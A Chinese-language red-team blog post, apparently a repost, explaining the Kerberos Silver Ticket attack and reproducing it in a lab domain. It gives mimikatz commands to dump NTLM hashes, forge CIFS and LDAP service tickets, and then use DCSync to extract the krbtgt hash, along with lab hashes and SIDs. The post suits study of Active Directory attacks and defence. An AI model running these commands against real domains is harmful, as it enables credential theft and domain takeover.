白银票据(Silver Ticket)攻击

admin
admin
admin
102963
文章
87
评论
2020年12月1日19:10:53评论71 views字数 2446阅读8分9秒阅读模式

渗透攻击红队

一个专注于红队攻击的公众号

白银票据(Silver Ticket)攻击


大家好,这里是 渗透攻击红队 的第 38 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更


白银票据(Silver Ticket)攻击
白银票据



Silver Ticket(白银票据)不同与 Golden Ticket。Silver Ticket 的利用过程是伪造 TGS,通过已知的授权服务密码生成一张可以访问该服务的 TGT。因为在票据生成过程中不需要使用 KDC,所以可以绕过域控制器,很少留下日志,而 Golden Ticket 在利用过程中需要由 KDC 颁发 TGT,并且在生成伪造的 TGT 的 20分钟内,TGS 不会对该 TGT 的真伪进行校验。


Silver Ticket(白银票据)依赖于服务账号的密码散列值,这不同于 Golden Ticket 利用需要使用 krbtgt 账号的密码哈希值,因此更加隐蔽。


Golden Ticket 使用 krbtgt 账号密码的哈希值,利用伪造高权限的 TGT 向 KDC 要求颁发拥有任意服务访问权限的票据,从而获取域控制器权限。


而 Silver Ticket(白银票据)会通过相应的服务账号来伪造 TGS,例如:LDAP、MSSQL、WinRM、DNS、CIFS 等,范围有限,只能获取对应服务权限。


Golden Ticket 是由 krbtgt 账号加密的,而 Silver Ticket(白银票据)是由特定服务账号加密的。



白银票据攻击

环境


攻击者在使用 Silver Ticket(白银票据)对内网进行攻击时,需要掌握下面的信息:

  • 域名

  • 域 SID(就是域成员SID值去掉最后的)

  • 目标服务器的 FQDN

  • 可利用的服务

  • 服务账号的 NTLM Hash

  • 需要伪造的用户名

白银票据伪造 CIFS 服务权限


CIFS 服务通常用于 Windows 主机之间的文件共享。

在当前域用户 mary 查询域控制器的共享目录的访问权限,发现没有权限:

dir \OWA2010CN-Godc$


白银票据(Silver Ticket)攻击

在域控制器中使用 mimikatz 获取服务账号的 NTLM Hash:

mimikatz log "privilege::debug" "sekurlsa::logonpasswords"


白银票据(Silver Ticket)攻击

白银票据(Silver Ticket)攻击

得到的域控制器的信息:

Username : AdministratorNTLM HASH:78c403b6e04402158d26c5581f9e954bsid:S-1-5-21-1218902331-2157346161-1782232778

在命令行环境下清空当前系统中的票据,防止其他票据对实验环境进行干扰:

klist purge

白银票据(Silver Ticket)攻击

或者可以使用 mimikatz 清除票据:

kerberos::purge

白银票据(Silver Ticket)攻击

查看域的 SID 值:

whoami /user

白银票据(Silver Ticket)攻击

得到的 SID :S-1-5-21-1218902331-2157346161-1782232778

之后就可以使用 mimikatz 生成伪造的 Silver Ticket 票据:(在不能访问域控制器的mary机器上执行)

kerberos::golden /domain:<域名> /sid:<域 SID> /target:<目标服务器主机名> /service:<服务类型> /rc4:<NTLMHash> /user:<伪造的用户名> /ptt
kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778  /target:OWA2010CN-God.god.org /rc4:78c403b6e04402158d26c5581f9e954b  /service:cifs /user:saul666 /ptt

白银票据(Silver Ticket)攻击

这个时候就能访问到域控的共享目录了:

dir \OWA2010CN-Godc$

白银票据(Silver Ticket)攻击


白银票据伪造 LDAP 服务权限


使用 dcsync 从域控制器中获取指定用户的账号和密码哈希值,例如 krbtgt。

输入命令查看当前权限是否可以使用 dcsync 与与控制器进行同步:

# 命令格式lsadump::dcsync /dc:域DC /domain:域名 /user:域用户名# 示例lsadump::dcsync /dc:OWA2010CN-God.god.org /domain:god.org /user:krbtgt

白银票据(Silver Ticket)攻击

向域控制器获取 krbtgt 的密码哈希值失败,说明当前权限不能进行 dcsync 操作。

输入命令在域控制器中使用 mimikatz 获取服务账号的 NTLM Hash:

mimikatz log "privilege::debug" "sekurlsa::logonpasswords"

白银票据(Silver Ticket)攻击

获取到的:

Username : OWA2010CN-GOD$NTLM     : 78c403b6e04402158d26c5581f9e954b

然后为了防止其他票据对实验进行干扰,我们先清除内存中的票据:

klist purge

白银票据(Silver Ticket)攻击

使用 mimikatz 生成伪造的 Silver Ticket,在之前不能使用 dcsync 从域控制器获取 krbtgt 密码哈希值的机器中输入命令:(域 mary 机器)

kerberos::golden /domain:god.org /sid:S-1-5-21-1218902331-2157346161-1782232778 /target:OWA2010CN-God.god.org /service:LDAP /rc4:78c403b6e04402158d26c5581f9e954b /user:saul666 /ptt

白银票据(Silver Ticket)攻击

这个时候输入命令,使用 dcsync 在域控制器中查询 krbtgt 的密码哈希值:

lsadump::dcsync /dc:OWA2010CN-God.god.org /domain:god.org /user:krbtgt

白银票据(Silver Ticket)攻击

Silver Ticket 还可以用于伪造其他服务,例如以下:

白银票据(Silver Ticket)攻击


参考文章:

https://blog.csdn.net/weixin_45728976/article/details/105290034


白银票据(Silver Ticket)攻击

渗透攻击红队

一个专注于渗透红队攻击的公众号

白银票据(Silver Ticket)攻击



白银票据(Silver Ticket)攻击
点分享
白银票据(Silver Ticket)攻击
点点赞
白银票据(Silver Ticket)攻击
点在看

本文始发于微信公众号(渗透攻击红队):白银票据(Silver Ticket)攻击

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年12月1日19:10:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   白银票据(Silver Ticket)攻击http://cn-sec.com/archives/194303.html

发表评论

匿名网友 填写信息